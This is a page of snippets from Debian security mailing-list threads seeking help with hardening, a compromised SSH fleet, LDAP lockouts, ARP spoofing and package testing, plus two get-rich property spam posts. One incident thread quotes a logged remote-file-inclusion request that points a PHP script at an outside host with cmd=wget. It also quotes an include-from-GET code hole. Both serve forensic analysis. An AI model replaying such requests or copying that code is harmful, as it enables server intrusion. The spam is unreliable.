How do I help the project?

Hello Everyone, I'm a developer, but for the last 2 years I've been working with AppSec, so I've been developing a lot less. I'm looking for a project to help. How can I get more information on how to help this project? How to execute? to correct? Anyway, I wanted to se

please help with python3-future removal

Dear Maintainer, The library python3-future is not compatible with Python 3.12 (and most importantly useless now) Please proceed these 3 easy bugs to help it's removal #1059109 [i| |♔] [src:plaso] plaso: please remove extraneous dependency on python3-future #1060116 [i| |♔] [src:wfuzz]

Re: Help

T+01:00 Peter Szabo : >> > Probably with your mail client? :) >> > >> > >> > On 2016-03-07 11:51, Zack Piper wrote: >> >> >> >> This is the third messgae you've sent of this kind, is there actually >> >> anything you need help with? >> >> >> >> >> > >> >> >

Re: Help

For urgency you should call the 911 2016-03-07 11:52 GMT+01:00 Peter Szabo : > Probably with your mail client? :) > > > On 2016-03-07 11:51, Zack Piper wrote: >> >> This is the third messgae you've sent of this kind, is there actually >> anything you need help with? >> >> >

Re: Help

Probably with your mail client? :) On 2016-03-07 11:51, Zack Piper wrote: This is the third messgae you've sent of this kind, is there actually anything you need help with?

Re: Help

This is the third messgae you've sent of this kind, is there actually anything you need help with? -- Zack Piper http://apertron.net

Help

Re: help

On Thu, Mar 3, 2016 at 7:17 PM, ldak mail wrote: > help What are you looking for help with? -- bye, pabs https://wiki.debian.org/PaulWise

help

help

Re: goals for hardening Debian: ideas and help wanted

27;t seem to find the real culprit - checkrestart fails to spot any relevant information, and neither lsof nor fuser -c could help me at this point * I'm using a customized grsec kernel - I first need to confirm that the issue also appears on a vanilla kernel * I'm using wheezy/sid m

Re: goals for hardening Debian: ideas and help wanted

ould like to help out with fixing this, you can find the script in CVS: https://anonscm.debian.org/viewvc/webwml/webwml/english/security/oval/ -- bye, pabs http://wiki.debian.org/PaulWise -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubsc

Re: goals for hardening Debian: ideas and help wanted

On Sat, Jun 7, 2014 at 9:31 PM, Xavier Roche wrote: > Would a read-only root filesystem goal be feasible ? We kind-of already support that; Debian Live is essentially that. What would official support for read-only root look like to you? Option in the installer? > https://wiki.debian.org/Readonl

Re: goals for hardening Debian: ideas and help wanted

On Thu, Apr 24, 2014 at 10:57:39AM +0800, Paul Wise wrote: > I have written a non-exhaustive list of goals for hardening the Debian > distribution, the Debian project and computer systems of the Debian > project, contributors and users. > If you have more ideas, please add them to the wiki page. W

Re: goals for hardening Debian: ideas and help wanted

n, please add it to the wiki page. > > If you would like to help, please choose an item and start work. > -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/53928208.7070...@comcast.net

Re: goals for hardening Debian: ideas and help wanted

ed to what comes from apparmor-profiles), and if the maintainer lack the resources and/or the interest to take care of such bugs, then they still have two useful options: * ask the AppArmor profiles team (Cc'd) for help to fix the profile, in order to go on shipping it along with the so

Re: Debians security features: Please help us!

-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Paul Wise: > On Sun, 2014-05-18 at 21:53 +0200, herzogbrigit...@t-online.de > wrote: > >> So: Please help us to complete the table. > > Why didn't you just use the Ubuntu script to automatically fill it > out? >

Re: Debians security features: Please help us!

On Sun, 2014-05-18 at 21:53 +0200, herzogbrigit...@t-online.de wrote: > So: Please help us to complete the table. Why didn't you just use the Ubuntu script to automatically fill it out? https://bazaar.launchpad.net/~ubuntu-security/ubuntu-cve-tracker/master/download/head:/dump

Debians security features: Please help us!

e not investigated yet. So: Please help us to complete the table. It's based on the security features table of Ubuntu (see https://wiki.ubuntu.com/Security/Features ). I hope that you can investigate and or write some information about the single features. Maybe the Ubuntu table can help to find ou

Re: goals for hardening Debian: ideas and help wanted

On 24 Apr 2014 10:58, "Andrew McGlashan" < andrew.mcglas...@affinityvision.com.au> wrote: > > On 24/04/2014 5:49 PM, Lesley Binks wrote: > > Apologies for the top posting, I'm writing this from my phone. > > I get a 403 when trying to access via Orbot/Orweb on Android 4.1 phone. > > Amusing. > > It

Re: goals for hardening Debian: ideas and help wanted

Marko Randjelovic: > On Tue, 29 Apr 2014 11:52:14 + > Patrick Schleizer wrote: > >> Marko Randjelovic: >>> I was thinking about some kind >>> of wizard: >>> >>> - create a chroot if doesn't already exist >>> - create a launcher for your DE >>> - create a shell script to run a program from ter

Re: goals for hardening Debian: ideas and help wanted

On Tue, 29 Apr 2014 11:52:14 + Patrick Schleizer wrote: > Marko Randjelovic: > > I was thinking about some kind > > of wizard: > > > > - create a chroot if doesn't already exist > > - create a launcher for your DE > > - create a shell script to run a program from terminal or a simple WM > >

Re: goals for hardening Debian: ideas and help wanted

> > chroot is not a security feature? > > As far I understand, chroots in Debian/Fedora aren't jails. > > Source: > https://securityblog.redhat.com/2013/03/27/is-chroot-a-security-feature/ > In deed a Linux chroot - environment is not a jail. You could use sth. like grsecurity to harden Linux

Re: goals for hardening Debian: ideas and help wanted

Marko Randjelovic: > I was thinking about some kind > of wizard: > > - create a chroot if doesn't already exist > - create a launcher for your DE > - create a shell script to run a program from terminal or a simple WM > > hint: chroot $CHROOT_PATH su - $USER -c "$command_with_args" chroot is not

Re: goals for hardening Debian: ideas and help wanted

On Tue, 29 Apr 2014 11:35:26 +0800 Paul Wise wrote: > On Tue, Apr 29, 2014 at 8:07 AM, Marko Randjelovic wrote: > > > - security patches should be clearly marked as such in every *.patch > > file > > That sounds like a good idea, could you add it to the wiki page? I added this: "Debian poli

Re: goals for hardening Debian: ideas and help wanted

On Tue, Apr 29, 2014 at 11:35:26AM +0800, Paul Wise wrote: > On Tue, Apr 29, 2014 at 8:07 AM, Marko Randjelovic wrote: > > > - security patches should be clearly marked as such in every *.patch > > file > > That sounds like a good idea, could you add it to the wiki page? It's not always easy t

Re: goals for hardening Debian: ideas and help wanted

On Tue, Apr 29, 2014 at 8:07 AM, Marko Randjelovic wrote: > - security patches should be clearly marked as such in every *.patch > file That sounds like a good idea, could you add it to the wiki page? > - easy create and run programs from chroot and alternate users Could you detail what you m

Re: goals for hardening Debian: ideas and help wanted

rdening/Goals > > If you have more ideas, please add them to the wiki page. > > If you have more information, please add it to the wiki page. > > If you would like to help, please choose an item and start work. > - security patches should be clearly marked as such in e

Re: goals for hardening Debian: ideas and help wanted

On Thu, Apr 24, 2014 at 9:49 AM, Giacomo Mulas wrote: > On Thu, 24 Apr 2014, Steve Langasek wrote: > >> The apparmor policies in Debian apply a principle of minimal harm, >> confining >> only those services for which someone has taken the time to verify the >> correct profile. There are obviously

Re: goals for hardening Debian: ideas and help wanted

On Thu, 24 Apr 2014, Steve Langasek wrote: The apparmor policies in Debian apply a principle of minimal harm, confining only those services for which someone has taken the time to verify the correct profile. There are obviously pros and cons to each approach to MAC, which I'm not interested in

Re: goals for hardening Debian: ideas and help wanted

On Thu, Apr 24, 2014 at 11:45:46AM +0200, Giacomo Mulas wrote: > On Thu, 24 Apr 2014, Paul Wise wrote: > >>Would the inclusion of more AppArmor profiles be applicable? > >Thanks, added along with SELinux/etc. > I second that. Actually, some time ago I tried using both AppArmor and > SELinux, but

Re: goals for hardening Debian: ideas and help wanted

On 24. huhtikuuta 2014 12.57.45 EEST, Andrew McGlashan wrote: >It works for me [Orbot/Orweb -- 4.3 on both i9300 and i9505], did you >get the case right? wiki.d.o seems to be blocking at least some Tor exit nodes. IMHO it should not do that, at least for read-only access. -- To UNSUBSCRIBE

Re: goals for hardening Debian: ideas and help wanted

h should a) help package maintainers learn how to create and include appropriate configuration files so that their package works with the MAC framework b) create some tools (debhelper-like?) to make it relatively easy to find the minimum access rights a package needs and implement them in a configurat

Re: goals for hardening Debian: ideas and help wanted

On 24/04/2014 5:49 PM, Lesley Binks wrote: > Apologies for the top posting, I'm writing this from my phone. > I get a 403 when trying to access via Orbot/Orweb on Android 4.1 phone. > Amusing. It works for me [Orbot/Orweb -- 4.3 on both i9300 and i9505], did you get the case right? Strangely thou

Re: goals for hardening Debian: ideas and help wanted

> I suggest it might be better if exploits were each given a quick/approximate > "ranking" in terms of severity (and if the severity is unknown it could be > assigned a default median ranking), so that the algorithm you mention wouldn't > just add number of unplugged exploits, but add them by weigh

Re: goals for hardening Debian: ideas and help wanted

On 10:57 Thu 24 Apr 2014, Paul Wise wrote: > ..[snip].. > https://wiki.debian.org/Hardening/Goals Regarding the line (at that page): > Refuse to install packages that are known to have X number of unplugged > exploits (i.e. X number of open security bugs in the bug tracker) unless > e.g. --allow-

Re: goals for hardening Debian: ideas and help wanted

bian > distribution, the Debian project and computer systems of the Debian > project, contributors and users. > > https://wiki.debian.org/Hardening/Goals > > If you have more ideas, please add them to the wiki page. > > If you have more information, please add it to the

Re: goals for hardening Debian: ideas and help wanted

> > If you have more ideas, please add them to the wiki page. > > If you have more information, please add it to the wiki page. > > If you would like to help, please choose an item and start work. > > -- > bye, > pabs > > http://wiki.debian.org/PaulWise >

Re: goals for hardening Debian: ideas and help wanted

more ideas, please add them to the wiki page. If you have more information, please add it to the wiki page. If you would like to help, please choose an item and start work. Would the inclusion of more AppArmor profiles be applicable? Thanks, -- Cameron Norman

Re: goals for hardening Debian: ideas and help wanted

On Thu, 2014-04-24 at 02:53 -0007, Cameron Norman wrote: > Would the inclusion of more AppArmor profiles be applicable? Thanks, added along with SELinux/etc. -- bye, pabs http://wiki.debian.org/PaulWise signature.asc Description: This is a digitally signed message part

goals for hardening Debian: ideas and help wanted

information, please add it to the wiki page. If you would like to help, please choose an item and start work. -- bye, pabs http://wiki.debian.org/PaulWise signature.asc Description: This is a digitally signed message part

Re: need help with openssh attack

2011/12/29, Taz : > Hello, we've got various debian servers, about 15, with different > versions. All of them have been attacked today and granted root > access. > Can anybody help? We can give ssh access to attacked machine, it seems > to be serious ssh vulnerability. &

Re: need help with openssh attack

On Thu, Dec 29, 2011 at 4:51 PM, Thijs Kinkhorst wrote: > On Thu, December 29, 2011 16:37, Nicolas Carusso wrote: >> >> How about creating a Referense list with all the suggestions that we are >> doing? >> If all of you agree, Let's start now. >> >> SECURITY LIST >> ** > > There's

Re: need help with openssh attack

On Fri, 30 Dec 2011, Taz wrote: > of course, i've double changed all password and regenerated ssh keys. Are the SSH and PAM settings doing what you think? I suggest carefully examining the contents of /etc to see what has been changed from the default. A new sshd vulnerability that allows remo

AW: need help with openssh attack

z der Gesellschaft Osnabrück, HRB 18841, Amtsgericht Osnabrück Geschäftsführer Andreas Kremer -Ursprüngliche Nachricht- Von: Noah Meyerhans [mailto:no...@debian.org] Gesendet: Donnerstag, 29. Dezember 2011 20:46 An: debian-security@lists.debian.org Betreff: Re: need help with openssh attack O

Re: need help with openssh attack

On Thu, Dec 29, 2011 at 11:30:27PM +0400, Taz wrote: > Anybody want's to check it out? > I can provide ssh access, if u will give me ssh key. From the sound of things, we're not going to find much. It's clear that the attackers have already cleaned up their tracks by editing auth.log, etc. The d

Re: need help with openssh attack

Anybody want's to check it out? I can provide ssh access, if u will give me ssh key. On Thu, Dec 29, 2011 at 11:06 PM, Noah Meyerhans wrote: > On Thu, Dec 29, 2011 at 04:39:24PM +0100, Kees de Jong wrote: >> I guess I already pointed out everything. I added the updating part to it. >> >> * Use

Re: need help with openssh attack

On 29.12.2011 18:08, Taz wrote: md5sum`s of sshd files seems to be same comparing to non infected system. I do not have any /etc/xinet.d .sshd_config are defaults ones.I will try to run find / -mtime -5 but i guess nothing interesting will come. Any another ideas? I still can provide ssh access

Re: need help with openssh attack

On Thu, Dec 29, 2011 at 04:39:24PM +0100, Kees de Jong wrote: > I guess I already pointed out everything. I added the updating part to it. > > * Use private not public keys with strong passwords This doesn't make any sense at all. You need both private and public keys for key-based authenticatio

Re: need help with openssh attack

md5sum`s of sshd files seems to be same comparing to non infected system. I do not have any /etc/xinet.d .sshd_config are defaults ones.I will try to run find / -mtime -5 but i guess nothing interesting will come. Any another ideas? I still can provide ssh access. On Thu, Dec 29, 2011 at 8:42 PM,

Re: need help with openssh attack

;>>> You can also try rkhunter and chkrootkit to find any rootkits on your >>>>> system, but they aren't conclusive. >>>>> >>>>> The only way to be sure that you are in the clear is a total new start on >>>>> all the affec

Re: need help with openssh attack

I'm wondering based on this if there is anything in /etc/xinetd.d or if there is anything in /etc/ssh/sshd_config that would point you in the right direction. Sounds like something is spawning based on a connection to port 22. (if OpenSSH itself wasn't exploited) Times like this: I've found tha

Re: need help with openssh attack

they aren't conclusive. >>>> >>>> The only way to be sure that you are in the clear is a total new start on >>>> all the affected machines. >>>> >>>> >>>> PS: We all got it now, fail2ban is a great tool ;-) >&g

Re: need help with openssh attack

is a total new start on >>> all the affected machines. >>> >>> >>> PS: We all got it now, fail2ban is a great tool ;-) >>> >>> >>> >>> >>> On Thu, Dec 29, 2011 at 15:04, Taz wrote: >>>> >>>> Hello, we'

Re: need help with openssh attack

be sure that you are in the clear is a total new start on >> all the affected machines. >> >> >> PS: We all got it now, fail2ban is a great tool ;-) >> >> >> >> >> On Thu, Dec 29, 2011 at 15:04, Taz wrote: >>> >>> Hello, we

RE: need help with openssh attack

2:37 Para: serge.dewai...@openevents.fr; debian-security@lists.debian.org Asunto: RE: need help with openssh attack How about creating a Referense list with all the suggestions that we are doing? If all of you agree, Let's start now. SECURITY LIST ** 1. SSH. Deny root

Re: need help with openssh attack

29, 2011 at 15:04, Taz wrote: >> >> Hello, we've got various debian servers, about 15, with different >> versions. All of them have been attacked today and granted root >> access. >> Can anybody help? We can give ssh access to attacked machine, it seems >>

RE: need help with openssh attack

On Thu, December 29, 2011 16:37, Nicolas Carusso wrote: > > How about creating a Referense list with all the suggestions that we are > doing? > If all of you agree, Let's start now. > > SECURITY LIST > ** There's already the Securing Debian HOWTO: http://www.debian.org/doc/manuals/

Re: need help with openssh attack

y and granted root access. Can anybody help? We can give ssh access to attacked machine, it seems to be serious ssh vulnerability. How can i contact openssh mnt? Thank you. -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble?

Re: need help with openssh attack

6:16:45 +0100 > > From: serge.dewai...@openevents.fr > > To: debian-security@lists.debian.org > > > Subject: Re: need help with openssh attack > > > > Hi, > > > > To prevent brute-force attack, you can also use the package named > > "fail2ban&

RE: need help with openssh attack

te. Keep debian Updated. 4 > Date: Thu, 29 Dec 2011 16:16:45 +0100 > From: serge.dewai...@openevents.fr > To: debian-security@lists.debian.org > Subject: Re: need help with openssh attack > > Hi, > > To prevent brute-force attack, you can also use the package named &

Re: need help with openssh attack

great tool ;-) On Thu, Dec 29, 2011 at 15:04, Taz wrote: > Hello, we've got various debian servers, about 15, with different > versions. All of them have been attacked today and granted root > access. > Can anybody help? We can give ssh access to attacked machine, it seems > t

Re: need help with openssh attack

about 15, with different versions. All of them have been attacked today and granted root access. Can anybody help? We can give ssh access to attacked machine, it seems to be serious ssh vulnerability. How can i contact openssh mnt? Thank you. -- To UNSUBSCRIBE, email to debian-security-requ...@l

RE: need help with openssh attack

il.com > CC: debian-security@lists.debian.org > Subject: Re: need help with openssh attack > > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Hello, > > Could you please paste /var/log/auth.log message of attack? > Are you sure about it's not any bruteforce

Re: need help with openssh attack

ts in your other servers, try to use fail2ban or similar. - -Ville 29.12.2011 16:04, Taz wrote: > Hello, we've got various debian servers, about 15, with different > versions. All of them have been attacked today and granted root > access. Can anybody help? We

Re: need help with openssh attack

ferent > > versions. All of them have been attacked today and granted root > > access. > > Can anybody help? We can give ssh access to attacked machine, it seems > > to be serious ssh vulnerability. > > > http://blog.sesse.net/blog/tech/2011-11-15-21-44_ebury_a_new_s

Re: need help with openssh attack

> versions. All of them have been attacked today and granted root > > access. Can anybody help? We can give ssh access to attacked > > machine, it seems to be serious ssh vulnerability. > > > > How can i contact openssh mnt? > > > > Thank you. >

Re: need help with openssh attack

On Fri, 30 Dec 2011, Taz wrote: > Hello, we've got various debian servers, about 15, with different > versions. All of them have been attacked today and granted root > access. > Can anybody help? We can give ssh access to attacked machine, it seems > to be serious ssh

Re: need help with openssh attack

ked today and granted root > access. Can anybody help? We can give ssh access to attacked > machine, it seems to be serious ssh vulnerability. > > How can i contact openssh mnt? > > Thank you. > > -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.17 (MingW32) Comment: Usi

need help with openssh attack

Hello, we've got various debian servers, about 15, with different versions. All of them have been attacked today and granted root access. Can anybody help? We can give ssh access to attacked machine, it seems to be serious ssh vulnerability. How can i contact openssh mnt? Thank you. -

More Information and help available?

Hi How would you like $3,222 / 2000 GBP / 2218 EURO for every property you see for sale worldwide on the web and in the streets of your town/city? Paid irrespective of property type, location or reason for sale to include fore.closures and repo's. No se.lling, paper-work, experience or train.

More info and help

Hi, How would you like a find.er's fee of $3,220 / 2000 GBP / 2215 EURO for every property you see for sale worldwide on the web and in the streets of your town/city? Find.er's fees are paid irrespective of property type, location or reason for sale to include fore.closures and repo's. No se

Re: Please help test openssl update

On Sun, Sep 06, 2009 at 08:45:12PM +0200, Moritz Muehlenhoff wrote: > Please test the openssl packages from > http://people.debian.org/~kroeckx/openssl > and report success/failure briefly to j...@debian.org. This update deprecates > MD-2 (CVE-2009-2409) and we'd like to hear about affected certif

Please help test openssl update

Please test the openssl packages from http://people.debian.org/~kroeckx/openssl and report success/failure briefly to j...@debian.org. This update deprecates MD-2 (CVE-2009-2409) and we'd like to hear about affected certificates used in the wild (results from testing/unstable are fairly limited so

Re: HELP !! Can not connect as root because LDAP is broken

Once you've got it fixed make your nsswitch.conf uses "compat" for passwd, group and shadow and root has a local password. I normally have a local non-root login to each machine as well. You can either configure that to have a password or use ssh keys to control access (or both). That'll save you t

Re: HELP !! Can not connect as root because LDAP is broken

hi ! you should have a root account in /etc/passwd ? try to boot with a live CD, backup your /etc/nsswitch.conf, remove all ldap entry in this file. You should just have : passwd: compat group: compat shadow: compat hosts: files mdns4_minimal [NOTFOUND=return

HELP !! Can not connect as root because LDAP is broken

Hello, I de-installed by mistake from my Debian machine (Lenny 2.6.18-6-686) the following packages: ii ldap-utils 2.3.30-5+etch2 OpenLDAP utilities ii libldap-2.3-0 2.3.30-5+etch2 OpenLDAP libraries ii libldap2 2.1.30-13.3 OpenLDAP libraries ii libnss-ldap 251-7.5etch1 NSS module for using LDAP

help testing evolution-data-server packages

Hi I'd appreciate some help with testing new evolution-data-server packages for lenny/etch. It would be helpful, if you could install these packages[0] and report back to me in a private email, whether NTLM authentication still works properly. Also, having a lookout for S/MIME stuff an

Re: [Debian-med-packaging] Bug#496366: Bug#496366: Bug#496366: The possibility of attack with the help of symlinks in some Debian packages

tag 496366 forwarded Kazutaka Katoh <[EMAIL PROTECTED]> thanks Hi all, I forwarded the patch solving the problem to the upstream author. I would prefer if I could include a note that the patch was accepted upstream if possible. How long would you recommend to wait before uploading ? Have a nice

Re: [Debian-med-packaging] Bug#496366: The possibility of attack with the help of symlinks in some Debian packages

On Monday 25 August 2008 05:56, Charles Plessy wrote: > I have not followed the discussions on -devel closely. What is the > relevance of this bug for the releasability of the package? Upstream is > already at a much higher version number and I am not able to solve the > prolem by myself. > > Since

Re: [Debian-med-packaging] Bug#496366: The possibility of attack with the help of symlinks in some Debian packages

tag 496366 help thanks Le Sun, Aug 24, 2008 at 10:05:28PM +0400, Dmitry E. Oboukhov a écrit : > Package: mafft > Severity: grave > > In some packages I've discovered scripts with errors which may be used > by a user for damaging important system files or user's fi

Re: help

On Tue, Feb 12, 2008 at 6:10 PM, Robert Shadowen <[EMAIL PROTECTED]> wrote: > help > > == > Robert Shadowen > Simulation/Verification Tools [EMAIL PRO

help

help == Robert Shadowen Simulation/Verification Tools [EMAIL PROTECTED] IBM Austin (512) 838-7603 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject

Re: Help on OpenOffice.org security upgrade requested

Hi, Manon Metten wrote: > For the testing distribution (etch) these problems have been fixed in > >version 2.0.4.dfsg.2-6. [...] > I checked with 'apt-cache show openoffice.org' and somewhere I found > 'Version: 2.0.4.dfsg.2-5'. [...]> > Is there anything wrong or missing in this sources.list? W

Help on OpenOffice.org security upgrade requested

Hi, I've read this security message concerning Openoffice.org. I'm very new to Debian GNU/Linux, and I don't know how to upgrade. I'm running etch on AMD64 (just installed last week). The security message it says: For the testing distribution (etch) these problems have been fixed in version

Re: Can you help me for erroe in syslog

On Tue, 2007-03-06 at 17:32 +0800, Li Bing Shun wrote: > Dear all: > > Error in syslog: > > SCSI device sdb: 71132000 512-byte hdwr sectors (36420 MB) > > Mar 5 12:35:24 www > kernel: /dev/scsi/host0/bus0/target1/lun0:<6>Device 08:10 not ready. > > Mar 5 12:35:24 www kernel: I/O

Can you help me for erroe in syslog

Dear all: Error in syslog: SCSI device sdb: 71132000 512-byte hdwr sectors (36420 MB) Mar 5 12:35:24 www kernel: /dev/scsi/host0/bus0/target1/lun0:<6>Device 08:10 not ready. Mar 5 12:35:24 www kernel: I/O error: dev 08:10, sector 0 Mar 5 12:35:24 www kernel: Device 08:10 not re

Re: help needed

On Mon, Nov 06, 2006 at 11:19:20AM +0100, Heilig Szabolcs wrote: > Hello! > > >http://jesusch.de/~jesusch/tmp/access.log > > There are many log entries with "something=http://"; style > pattern. These are common attack methods against default configured > servers with poorly written applications.

Re: ***DEB*: Re: help needed

On Mon, Nov 06, 2006 at 06:21:26PM +0100, Fuzzums wrote: > 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET > http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget > HTTP/1.0" 403 495 > "http://85.214.18.193

Re: ***DEB*: Re: help needed

Hi Fuzzums, Fuzzums schrieb: 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 495 "http://85.214.18.193/manager/media/browser/mcpuk/conne

Re: ***DEB*: Re: help needed

213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 495 "http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.p

Re: help needed

Hi, > at that mentioned time someone at least tried to access pages which are > not accessable (index.php?img=1 e.g.) > > ther definately might be a problem in the code: > > if ( $_GET['page'] ) { > include $_GET['page'].'/index.php'; > } > > > could this be the vulnerable code segment?

Re: help needed

Hello! http://jesusch.de/~jesusch/tmp/access.log There are many log entries with "something=http://"; style pattern. These are common attack methods against default configured servers with poorly written applications. Many of these rely on register_globals=on php.ini setting. Turn it off first

Re: help needed

segment? Arthur de Jong schrieb: -BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 As I'm not so aware could someone be so kind to help me with a forensic analysis? I also still do not know which program (propably any php-stuff) was/is vulnerable. All I've found so far where these entri

Re: help needed

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 As I'm not so aware could someone be so kind to help me with a forensic analysis? I also still do not know which program (propably any php-stuff) was/is vulnerable. All I've found so far where these entries in my apache2 error-

help needed

Hi list, My sarge box box was recently hacked by some script kiddy who installed an irc-dcc-filserver on it :/ As I'm not so aware could someone be so kind to help me with a forensic analysis? I also still do not know which program (propably any php-stuff) was/is vulnerable. All I

Re: help: duplicate MAC address

Hello, On Thu, Oct 19, 2006 at 01:00:27AM +0200, Javier Fern?ndez-Sanguino Pe?a wrote: > ... a Rogue user is sending you gratuitous ARP packets to poison your cache > for all IPs in the network ... Please excuse me for going out of the original topic, but there is one thing I would like to clarif

Re: help: duplicate MAC address

On 10/20/06, Javier Fernández-Sanguino Peña <[EMAIL PROTECTED]> wrote: On Thu, Oct 19, 2006 at 11:01:39AM +0800, Lestat V wrote: > On 10/19/06, Lestat V <[EMAIL PROTECTED]> wrote: > >On 10/19/06, Javier Fernández-Sanguino Peña <[EMAIL PROTECTED]> wrote: > >> On Wed, Oct 18, 2006 at 11:09:35AM +08

Re: help: duplicate MAC address

On 10/20/06, Javier Fernández-Sanguino Peña <[EMAIL PROTECTED]> wrote: On Thu, Oct 19, 2006 at 07:53:29AM +0800, Lestat V wrote: No, you arp requests are the "arp who-has YYY tell XXX" where XXX is the one [...] Sorry for the misunderstanding. Yes, but do you *see* ARP replies incoming to you

Re: help: duplicate MAC address

On Thu, Oct 19, 2006 at 11:01:39AM +0800, Lestat V wrote: > On 10/19/06, Lestat V <[EMAIL PROTECTED]> wrote: > >On 10/19/06, Javier Fernández-Sanguino Peña <[EMAIL PROTECTED]> wrote: > >> On Wed, Oct 18, 2006 at 11:09:35AM +0800, Lestat V wrote: > > I tried "/usr/sbin/tcpdump -ei eth0 arp" for a w

  1   2   3   4   5   6   7   >